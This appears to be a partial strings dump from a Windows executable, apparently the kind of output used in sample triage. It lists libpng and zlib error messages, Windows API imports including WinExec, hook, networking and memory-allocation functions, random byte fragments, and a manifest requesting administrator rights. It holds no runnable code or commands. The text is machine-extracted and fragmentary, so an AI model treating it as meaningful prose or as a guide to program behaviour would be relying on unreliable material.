tooltips_class32
Too many IDATs found
too many length or distance symbols
Too many links
Too many open files
Too many open files in system
too many profiles
too many sPLT chunks
too many text chunks
too many unknown chunks
Too much image data
too short
To: %s
TranslateAcceleratorA
TranslateMessage
trhPCJ
tRHt}H
tRNS chunk has out-of-range samples for bit_depth
tRNS must be after
T$,RQP
t%RSQP
truncated
Tuesday
 (*.txt)|*.txt|
- unable to initialize heap
- unable to open console device
undefined
unexpected 8-bit transformation
unexpected alpha swap transformation
unexpected bit depth
unexpected compose
unexpected DeviceLink ICC profile class
unexpected encoding (internal error)
unexpected end of LZ stream
- unexpected heap error
unexpected ICC PCS encoding
- unexpected multithread lock error
unexpected NamedColor ICC profile class
unexpected zlib return
unexpected zlib return code
>:uNFV
unhandled critical chunk
UnhandledExceptionFilter
UnhookWindowsHookEx
Uninitialized row
unknown chunk exceeds memory limits
unknown chunk: out of memory
unknown compression method
Unknown compression method in IHDR
unknown compression type
Unknown error
Unknown filter method in IHDR
Unknown interlace method in IHDR
unknown interlace type
UNLINK
UnlockFile
unrecognized equation type
unrecognized ICC profile class
UnregisterClassA
unsupported zlib version
UpdateWindow
uR9BxuM
uRFGHt
us-ascii
USER32
user32.dll
User32.dll
USER32.dll
User-Agent:
 using zstream
ValidateRect
VC20XC00U
V#D$,WPQ
Vh;VX|
VirtualAlloc
VirtualFree
WaitForInputIdle
WaitForMultipleObjects
WaitForSingleObject
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPause
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
 (*.WAV;*.MID)|*.WAV;*.MID|WAV
 (*.WAV)|*.WAV|MIDI
Wednesday
	WG!2S(
WideCharToMultiByte
window
WindowFromPoint
windows
WinExec
WinHelpA
wininet.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WriteFile
WritePrivateProfileStringA
WS2_32.dll
wsprintfA
WTWindow
|$@ Wu
|$ WUSV
wvsprintfA
"WWShx
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">    <security>        <requestedPrivileges>            <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>        </requestedPrivileges>    </security></trustInfo></assembly>
zlib IO error
zstream unclaimed